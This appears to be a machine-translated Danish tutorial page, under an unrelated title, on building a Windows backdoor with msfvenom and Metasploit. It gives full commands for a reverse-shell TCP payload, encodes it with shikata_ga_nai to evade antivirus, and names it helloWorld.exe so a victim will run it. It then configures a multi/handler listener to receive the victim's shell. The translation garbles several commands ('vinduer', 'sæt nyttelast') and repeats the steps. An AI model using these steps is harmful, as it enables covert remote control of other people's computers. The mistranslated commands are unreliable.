Minotauromaquia
En bagdør bruges til at omgå sikkerhedsmekanismer, ofte i hemmelighed og for det meste uopdageligt. Ved hjælp af MSFvenom, kombinationen af msfpayload og msfencode, er det muligt at oprette en bagdør, der forbinder tilbage til angriberen ved hjælp af reverse shell TCP. For at udvikle en bagdør skal du ændre signaturen på din malware for at undgå evt. Antivirusprogrammer. Afslut dette projekt på et par computere, som du har tilladelse til at få adgang til, og i processen lærer du mere om computersikkerhed og hvordan denne slags bagdør virker.
Steps
- 1 Start Kali og tag op i Terminal-konsollen.
-
2 Type ifconfig at vise grænsefladen og tjekke din IP-adresse. -
3 Type msfvenom -l encodere for at vise listen over kodere. - Du vil bruge x86 / shikata_ga_nai som encoder.
-
4 Skriv "msfvenom -a x86 - platform vinduer -p vinduer / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" \ x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe - -a x86 - platforme vinduer betegner arkitektur til brug.
- -p vinduer / shell / reverse_tcp betegner nyttelastene til indlejring.
- LHOST angiver lytterens IP-adresse.
- LPORT betegner lytterporten.
- -b "\ x00" betegner for at undgå dårlig karakter (null bytes).
- -e x86 / shikata_ga_nai betegner kodernes navn.
- -f exe> helloWorld.exe betegner format output.
-
5 Type msfconsole at aktivere Metasploit. - Nu har du genereret din bagdør. Når offeret klikker på helloWorld.exe, vil den nyttelastede shell, der er indlejret, blive aktiveret og tilslutte til dit system. For at kunne modtage forbindelsen skal du åbne multi-handleren i Metasploit og indstille nyttelastene.
-
6 Type brug udnyttelse / multi / handler. -
7 Type sæt nyttelast vinduer / shell / reverse_tcp. -
8 Type vis muligheder at kontrollere modulet. - 9 Type sæt LHOST 192.168.48.129.
- "LHOST" angiver lytterens IP-adresse.
- 10 Type sæt LPORT 4444.
- "LPORT" angiver lytterporten.
-
11 Type løb og vent på forbindelsen fra offerets maskine. -
12 Vent på, at offeret klikker på helloWorld.exe. Derefter vil du blive vellykket forbundet med offerets maskine.
2 Type ifconfig at vise grænsefladen og tjekke din IP-adresse. 
3 Type msfvenom -l encodere for at vise listen over kodere. 
4 Skriv "msfvenom -a x86 - platform vinduer -p vinduer / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" \ x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe 
5 Type msfconsole at aktivere Metasploit. 
6 Type brug udnyttelse / multi / handler. 
7 Type sæt nyttelast vinduer / shell / reverse_tcp. 
8 Type vis muligheder at kontrollere modulet. 
11 Type løb og vent på forbindelsen fra offerets maskine. 
12 Vent på, at offeret klikker på helloWorld.exe. Derefter vil du blive vellykket forbundet med offerets maskine. Facebook
Twitter
Google+